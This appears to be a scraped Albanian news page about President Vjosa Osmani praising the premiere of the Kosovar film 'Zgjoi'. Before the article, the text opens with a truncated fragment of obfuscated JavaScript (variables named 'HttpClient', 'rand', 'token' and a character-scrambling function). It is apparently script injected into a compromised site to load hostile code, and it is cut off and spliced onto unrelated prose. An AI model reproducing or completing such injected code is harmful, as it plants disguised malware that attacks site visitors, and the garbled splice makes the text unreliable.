;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çka tha presidentja Osmani për filmin ‘Zgjoi’?

By

Nën partionatin e Presidentes së Kosovës, Vjosa Osmanit, mbrëmë ishte dhënë premiera e filmit të suksesshëm kosovar “Zgjoi”.

Presidentja Osmani ka thënë se ishte nder dhe kënaqësi e veçantë që mbrëmë së bashku me ekipin e filmit “Zgjoi”, organizuan premierën e këtij filmi.

“Kur një histori dhimbjeje, frymëzimi, sakrifice, përkushtimi, humbjeje e triumfi siç është historia e znj. Fahrije Hoti dhe e grave të Krushës vjen nën interpretimin maestral të aktorëve tanë të jashtëzakonshëm në krye me Yllka Gashin, e shfaqet në ekran me profesionalizëm nën regjinë e një regjisoreje të shkëlqyeshme si Blerta Basholli – rezultati final s’mund të ishte asgjë më pak se sa një krijimtari artistike për ta pasur zili edhe bota”, ka shkruar Osmani në Facebook.

“Ditë pas dite, sukseset e kinematografisë sonë sa vijnë e bëhen më kolosale. Nëpërmjet filmit, filmbërësit tanë po e tregojnë rrëfimin e Kosovës, dhimbjet, vuajtjet, sfidat, sukseset, të arriturat, kulturën, mendësinë, zhvillimin dhe historinë tonë. Ata tashmë janë ambasadorët tanë, nëpërmjet të cilëve Kosova po hap kapituj të ri të lavdisë!”, ka vazhduar tutje ajo.

Osmani është shprehur falënderuese që historia e Kosovës po shndritet me gjurmë të suksesit.

Artikuj të ngjashëm